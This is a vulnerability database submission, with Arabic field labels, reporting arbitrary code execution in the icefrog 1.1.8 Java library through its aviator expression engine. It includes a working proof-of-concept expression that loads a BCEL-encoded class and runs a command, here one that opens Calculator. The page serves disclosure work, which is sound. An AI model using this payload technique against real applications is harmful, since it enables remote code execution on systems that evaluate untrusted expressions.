| عنوان | icefrog v1.1.8 Hava an Execute Arbitrary Code vulnerability |
|---|
| الوصف | IceFrog is a suite of core and expanded libraries that include utility classes, collections, I/O classes, and much more.a tools like Guava ,apache commons,hutool.
In icefrog 1.1.8, the reference enters the aviator engine to parse the expression, and the aviator expression can directly enter the new object, but it is not allowed to call non-public static methods. You can use BCELClassloader to load BCEL code to accomplish RCE.
When a user uses icefrog to parse an expression, the aviator template engine is triggered, leading to an arbitrary code execution vulnerability.
the testCode is here:
import com.whaleal.icefrog.extra.expression.ExpressionUtil;
String exp = "'a'+(c=Class.forName(\"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$5dP$cbJ$c3$40$U$3d$d3$a6M$8d$d1$b6$d6$fa$CAW$a6$5d$98$8d$bb$88$hQ$Q$8a$V$x$ee$93x$JS$f2$uy$94$7c$96nT$5c$f8$B$7e$94x$tJ$5b$i$98s$ef$3d$9c$3b$e70_$df$l$9f$A$cep$60$a0$81$8e$81$$$b6$U$f4tl$eb$e8$L4$cfe$y$f3$L$81$ba5x$U$d0$$$93$t$Sh$8fdL$b7E$e4Q$fa$e0z$n3$g$95$e4$L$9cX$a3$a9$3bw$ed$d0$8d$D$7b$92$a72$O$9c$c1$Ku$97$s$3ee$99$p$60$5c$95$3e$cdr$99$c4$99$8e$j$9e$tI$91$fat$z$d5kk4$97$e1$a9Z3$d1$84$aec$d7$c4$k$f6M$YX$X$e8$qi$60S$e9F$b3$90l$a5dji1$f6$a6$e4$e7$C$bd$8a$92$89$7d3$5eX$Jt$97$c2$fb$o$cee$c4nF$40$f9b$e8$5b$aby$ffh$H$c7$d0$f8$83$d4$a9A$a8L$8c$z$9e$O$b9$K$ae$8d$e1$h$c4$L7$i$9e$b1$f9Kr$cf$89yEI$8f$aaU$a0$f5$8e$da$f0$V$f5$e7$7fj$j$s$a3$c6$fd$G$df$cd$ca$aa$fd$D$fe$90$a41$a1$B$A$A\",true,new com.sun.org.apache.bcel.internal.util.ClassLoader()) ) + ( c.exec(\"open /System/Applications/Calculator.app\") );";
final Object eval = ExpressionUtil.eval(exp, null); |
|---|
| المصدر | ⚠️ https://github.com/NanKeXXX/selfVuln_poc/blob/main/whaleal%3Aicefrog/icefrog_1.1.8_RCE.md |
|---|
| المستخدم | dreamfly (UID 37785) |
|---|
| ارسال | 15/06/2023 08:58 AM (3 سنوات منذ) |
|---|
| الاعتدال | 18/06/2023 09:49 AM (3 days later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 231804 [whaleal IceFrog 1.1.8 Aviator Template Engine تجاوز الصلاحيات] |
|---|
| النقاط | 20 |
|---|